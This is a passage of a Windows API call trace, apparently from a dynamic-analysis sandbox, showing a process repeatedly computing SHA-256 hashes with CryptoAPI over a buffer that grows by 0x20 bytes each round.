	[0154.909] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.909] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.909] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0154.909] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.909] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310230
	[0154.910] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310230, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310230, pdwDataLen=0x128aac) returned 1
	[0154.910] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.910] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.910] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.910] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.910] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0154.910] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.910] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310258
	[0154.910] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310258, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310258, pdwDataLen=0x128aac) returned 1
	[0154.910] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.910] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.910] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.911] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.911] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0154.911] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.911] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310280
	[0154.911] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310280, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310280, pdwDataLen=0x128aac) returned 1
	[0154.911] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.911] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.911] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.911] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.911] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0154.911] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.911] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23102a8
	[0154.911] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23102a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23102a8, pdwDataLen=0x128aac) returned 1
	[0154.911] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.911] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.911] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.912] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.912] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0154.912] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.912] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23102d0
	[0154.912] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23102d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23102d0, pdwDataLen=0x128aac) returned 1
	[0154.912] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.912] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.912] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.912] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.912] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0154.912] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.912] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23102f8
	[0154.912] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23102f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23102f8, pdwDataLen=0x128aac) returned 1
	[0154.912] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.912] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.912] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.913] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.913] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0154.913] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.913] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310320
	[0154.913] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310320, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310320, pdwDataLen=0x128aac) returned 1
	[0154.913] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.913] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.913] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.913] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.913] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0154.913] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.913] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310348
	[0154.913] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310348, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310348, pdwDataLen=0x128aac) returned 1
	[0154.913] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.913] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.913] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.914] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.914] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0154.914] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.914] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310370
	[0154.914] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310370, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310370, pdwDataLen=0x128aac) returned 1
	[0154.914] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.914] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.914] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.914] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.914] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0154.914] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.914] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310398
	[0154.914] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310398, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310398, pdwDataLen=0x128aac) returned 1
	[0154.914] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.914] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.914] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.915] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.915] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0154.915] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23103c0
	[0154.915] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23103c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23103c0, pdwDataLen=0x128aac) returned 1
	[0154.915] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.915] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.915] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.915] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.915] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0154.915] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23103e8
	[0154.915] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23103e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23103e8, pdwDataLen=0x128aac) returned 1
	[0154.915] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.915] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.915] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.916] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.916] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0154.916] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.916] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310410
	[0154.916] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310410, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310410, pdwDataLen=0x128aac) returned 1
	[0154.916] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.916] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.916] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.916] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.916] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0154.916] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.916] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310438
	[0154.916] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310438, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310438, pdwDataLen=0x128aac) returned 1
	[0154.916] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.916] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.916] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.917] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.917] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0154.917] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310460
	[0154.917] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310460, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310460, pdwDataLen=0x128aac) returned 1
	[0154.917] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.917] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.917] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.917] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.917] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0154.917] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310488
	[0154.917] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310488, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310488, pdwDataLen=0x128aac) returned 1
	[0154.917] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.917] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.917] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.918] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.918] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0154.918] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.918] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23104b0
	[0154.918] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23104b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23104b0, pdwDataLen=0x128aac) returned 1
	[0154.918] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.918] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.918] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.918] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.918] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0154.918] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.918] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23104d8
	[0154.918] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23104d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23104d8, pdwDataLen=0x128aac) returned 1
	[0154.918] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.918] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.918] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.919] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.919] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0154.919] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.919] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310500
	[0154.919] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310500, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310500, pdwDataLen=0x128aac) returned 1
	[0154.919] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.919] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.919] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.919] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.919] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0154.919] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.919] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310528
	[0154.919] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310528, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310528, pdwDataLen=0x128aac) returned 1
	[0154.919] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.919] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.919] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.920] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.920] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0154.920] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310550
	[0154.920] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310550, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310550, pdwDataLen=0x128aac) returned 1
	[0154.920] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.920] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.920] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.920] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.920] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0154.920] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310578
	[0154.920] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310578, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310578, pdwDataLen=0x128aac) returned 1
	[0154.920] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.920] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.920] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.921] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.921] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0154.921] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23105a0
	[0154.921] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23105a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23105a0, pdwDataLen=0x128aac) returned 1
	[0154.921] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.921] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.921] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.921] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.921] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0154.921] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23105c8
	[0154.921] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23105c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23105c8, pdwDataLen=0x128aac) returned 1
	[0154.921] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.921] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.921] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.922] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.922] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0154.922] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23105f0
	[0154.922] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23105f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23105f0, pdwDataLen=0x128aac) returned 1
	[0154.922] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.922] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.922] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.922] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.922] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xac0, dwFlags=0x0) returned 1
